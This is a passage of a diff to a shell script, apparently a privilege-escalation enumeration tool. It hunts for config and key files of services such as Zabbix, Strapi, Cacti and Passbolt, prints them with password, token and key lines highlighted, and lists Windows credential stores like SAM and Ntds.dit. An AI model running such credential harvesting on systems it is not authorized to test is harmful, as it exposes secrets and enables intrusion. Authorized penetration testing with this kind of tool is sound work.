[ "$DEBUG" ]; then + print_2title "Analyzing InfluxDB Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INFLUXDB\" | grep -E \"influxdb\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "influxdb.conf"; fi; fi; printf "%s" "$PSTORAGE_INFLUXDB" | grep -E "influxdb\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,influxdb\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,auth-enabled.*=.*false|token|https-private-key,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_ZABBIX" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Zabbix Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_server\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_server.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_server\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_server\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,DBName|DBUser|DBPassword,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix_agentd\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix_agentd.conf"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix_agentd\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix_agentd\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,TLSPSKFile|psk,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_ZABBIX\" | grep -E \"zabbix$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "zabbix"; fi; fi; printf "%s" "$PSTORAGE_ZABBIX" | grep -E "zabbix$" | while read f; do ls -ld "$f" | sed -${E} "s,zabbix$,${SED_RED},"; find "$f" -name "*.psk" | while read ff; do ls -ld "$ff" | sed -${E} "s,.psk,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_PRE_SHARED_KEYS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pre-Shared Keys Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PRE_SHARED_KEYS\" | grep -E \"\.psk$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.psk"; fi; fi; printf "%s" "$PSTORAGE_PRE_SHARED_KEYS" | grep -E "\.psk$" | while read f; do ls -ld "$f" | sed -${E} "s,\.psk$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_PASS_STORE_DIRECTORIES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Pass Store Directories Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PASS_STORE_DIRECTORIES\" | grep -E \"\.password-store$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".password-store"; fi; fi; printf "%s" "$PSTORAGE_PASS_STORE_DIRECTORIES" | grep -E "\.password-store$" | while read f; do ls -ld "$f" | sed -${E} "s,\.password-store$,${SED_RED},"; ls -lRA "$f";done; echo ""; +fi + + +if [ "$PSTORAGE_BIND" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Bind Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_BIND\" | grep -E \"bind$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bind"; fi; fi; printf "%s" "$PSTORAGE_BIND" | grep -E "bind$" | while read f; do ls -ld "$f" | sed -${E} "s,bind$,${SED_RED},"; find "$f" -name "*" | while read ff; do ls -ld "$ff" | sed -${E} "s,.*,${SED_RED},"; done; echo "";find "$f" -name "*.key" | while read ff; do ls -ld "$ff" | sed -${E} "s,.key,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_SEEDDMS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing SeedDMS Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SEEDDMS\" | grep -E \"seeddms.*$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "seeddms*"; fi; fi; printf "%s" "$PSTORAGE_SEEDDMS" | grep -E "seeddms.*$" | while read f; do ls -ld "$f" | sed -${E} "s,seeddms.*$,${SED_RED},"; find "$f" -name "settings.xml" | while read ff; do ls -ld "$ff" | sed -${E} "s,settings.xml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "=" | sed -${E} "s,[pP][aA][sS][sS],${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_DDCLIENT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Ddclient Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_DDCLIENT\" | grep -E \"ddclient\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ddclient.conf"; fi; fi; printf "%s" "$PSTORAGE_DDCLIENT" | grep -E "ddclient\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,ddclient\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,.*password.*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_SENTRY" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Sentry Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry$,${SED_RED},"; find "$f" -name "config.yml" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.yml,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,*key*,${SED_RED},g"; done; echo "";done; echo ""; + if ! [ "`echo \"$PSTORAGE_SENTRY\" | grep -E \"sentry\.conf\.py$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sentry.conf.py"; fi; fi; printf "%s" "$PSTORAGE_SENTRY" | grep -E "sentry\.conf\.py$" | while read f; do ls -ld "$f" | sed -${E} "s,sentry\.conf\.py$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_STRAPI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Strapi Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_STRAPI\" | grep -E \"environments$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "environments"; fi; fi; printf "%s" "$PSTORAGE_STRAPI" | grep -E "environments$" | while read f; do ls -ld "$f" | sed -${E} "s,environments$,${SED_RED},"; find "$f" -name "custom.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,custom.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "database.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,database.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "request.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,request.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "response.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,response.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "security.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,security.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";find "$f" -name "server.json" | while read ff; do ls -ld "$ff" | sed -${E} "s,server.json,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | sed -${E} "s,username.*|[pP][aA][sS][sS].*|secret.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_CACTI" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Cacti Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_CACTI\" | grep -E \"cacti$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "cacti"; fi; fi; printf "%s" "$PSTORAGE_CACTI" | grep -E "cacti$" | while read f; do ls -ld "$f" | sed -${E} "s,cacti$,${SED_RED},"; find "$f" -name "config.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "config.php.dist" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.php.dist,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "installer.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,installer.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";find "$f" -name "check_all_pages" | while read ff; do ls -ld "$ff" | sed -${E} "s,check_all_pages,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "database_pw|database_user|database_pass|database_type|database_default|detabase_hostname|database_port|database_ssl" | sed -${E} "s,database_pw.*|database_user.*|database_pass.*,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_ROUNDCUBE" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Roundcube Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_ROUNDCUBE\" | grep -E \"roundcube$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "roundcube"; fi; fi; printf "%s" "$PSTORAGE_ROUNDCUBE" | grep -E "roundcube$" | while read f; do ls -ld "$f" | sed -${E} "s,roundcube$,${SED_RED},"; find "$f" -name "config.inc.php" | while read ff; do ls -ld "$ff" | sed -${E} "s,config.inc.php,${SED_RED},"; cat "$ff" 2>/dev/null | grep -IEv "^$" | grep -E "config\[" | sed -${E} "s,db_dsnw,${SED_RED},g"; done; echo "";done; echo ""; +fi + + +if [ "$PSTORAGE_PASSBOLT" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Passbolt Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_PASSBOLT\" | grep -E \"passbolt\.php$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "passbolt.php"; fi; fi; printf "%s" "$PSTORAGE_PASSBOLT" | grep -E "passbolt\.php$" | while read f; do ls -ld "$f" | sed -${E} "s,passbolt\.php$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "host|port|username|password|database" | grep -Ev "^#" | sed -${E} "s,[pP][aA][sS][sS].*|[uU][sS][eE][rR].*,${SED_RED},g"; done; echo ""; +fi + + +if [ "$PSTORAGE_JETTY" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Jetty Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_JETTY\" | grep -E \"jetty-realm\.properties$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "jetty-realm.properties"; fi; fi; printf "%s" "$PSTORAGE_JETTY" | grep -E "jetty-realm\.properties$" | while read f; do ls -ld "$f" | sed -${E} "s,jetty-realm\.properties$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; +fi + + + + +if [ "$PSTORAGE_INTERESTING_LOGS" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Interesting logs Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"access\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "access.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "access\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,access\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_INTERESTING_LOGS\" | grep -E \"error\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "error.log"; fi; fi; printf "%s" "$PSTORAGE_INTERESTING_LOGS" | grep -E "error\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,error\.log$,${SED_RED},"; done; echo ""; +fi + + +if [ "$PSTORAGE_WINDOWS_FILES" ] || [ "$DEBUG" ]; then + print_2title "Analyzing Windows Files Files (limit 70)" + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"\.rdg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.rdg"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "\.rdg$" | while read f; do ls -ld "$f" | sed -${E} "s,\.rdg$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"AppEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "AppEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "AppEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,AppEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ConsoleHost_history\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ConsoleHost_history.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ConsoleHost_history\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,ConsoleHost_history\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"FreeSSHDservice\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "FreeSSHDservice.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "FreeSSHDservice\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,FreeSSHDservice\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"NetSetup\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "NetSetup.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "NetSetup\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,NetSetup\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"Ntds\.dit$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "Ntds.dit"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "Ntds\.dit$" | while read f; do ls -ld "$f" | sed -${E} "s,Ntds\.dit$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"protecteduserkey\.bin$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "protecteduserkey.bin"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "protecteduserkey\.bin$" | while read f; do ls -ld "$f" | sed -${E} "s,protecteduserkey\.bin$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"RDCMan\.settings$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "RDCMan.settings"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "RDCMan\.settings$" | while read f; do ls -ld "$f" | sed -${E} "s,RDCMan\.settings$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SAM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SAM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SAM$" | while read f; do ls -ld "$f" | sed -${E} "s,SAM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SYSTEM$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SYSTEM"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SYSTEM$" | while read f; do ls -ld "$f" | sed -${E} "s,SYSTEM$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "SecEvent\.Evt$" | while read f; do ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "appcmd\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "bash\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "datasources\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "default\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "drives\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "groups\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https-xampp\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "https\.conf$" | while read f; do ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "iis6\.log$" | while read f; do ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "index\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.cnf$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "my\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "ntuser\.dat$" | while read f; do ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "pagefile\.sys$" | while read f; do ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "printers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "recentservers\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scclient\.exe$" | while read f; do ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "scheduledtasks\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "security\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "server\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "setupinfo\.bak$" | while read f; do ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sitemanager\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sites\.ini$" | while read f; do ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software$" | while read f; do ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "software\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.inf$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "sysprep\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "system\.sav$" | while read f; do ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.txt$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattend\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS_FILES" | grep -E "unattended\.xml$" | while read f; do ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_WINDOWS_FILES\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; 